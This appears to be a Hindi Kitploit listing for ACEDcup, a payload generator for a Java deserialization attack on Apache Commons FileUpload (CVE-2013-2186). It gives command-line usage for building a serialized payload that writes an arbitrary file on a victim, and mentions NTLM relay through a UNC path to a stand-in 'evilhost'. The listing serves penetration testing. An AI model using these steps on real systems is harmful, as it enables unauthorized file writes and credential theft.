Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ACEDcup — पेलोड जनरेटर जावा बाइनरी डिसीरियलाइज़ेशन हमले के लिए Commons FileUpload (CVE-2013-2186) के साथ | Kitploit
उपकरण/GitHubGitHub/grrrdog/acedcup
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubgrrrdog/acedcup

ACEDcup

पेलोड जनरेटर जावा बाइनरी डिसीरियलाइज़ेशन हमले के लिए Commons FileUpload (CVE-2013-2186) के साथ

रिपॉजिटरी देखें
371410 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ACEDcup

ACEDcup उपकरण Java बाइनरी Deserialization हमले (ACED) के लिए पेलोड जनरेटर है।

यह Apache Commons FileUpload ver <= 1.3 (CVE-2013-2186) और Oracle JDK ver < 7u40 के लिए है।

यह हमला lib या Java के नए संस्करणों पर भी काम करता है। हम किसी भी निर्देशिका में कोई भी सामग्री अपलोड कर सकते हैं, लेकिन इस स्थिति में हम फ़ाइल नाम को नियंत्रित नहीं कर सकते (जैसे upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp)। हालांकि, यह कुछ मामलों में उपयोगी हो सकता है।

इसके अलावा, यदि आपका लक्ष्य Windows OS पर है तो हम NTLM-relay/sniffing हमला (\\evilhost\any\path का उपयोग करके) कर सकते हैं।

उपयोग

root@kitploit:~
  1)At first, we create a serialized payload:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - a path to a file with your payload
  /path/target - a path to a file that will be created in your victim (this will be stored in the serialized payload)
  /path/out - a path to a file with serialized payload
  0 - turn off null-byte ending if you attack a patched system (with null-byte- by default)

  2)Then we set the serialized payload to the serialized reader (if we want to test the vuln on your host) :
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tries to deserialize the payload and because of a vulnerability in it's library, it creates a new file in the directory specified.

उदाहरण

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

टूल डाउनलोड करें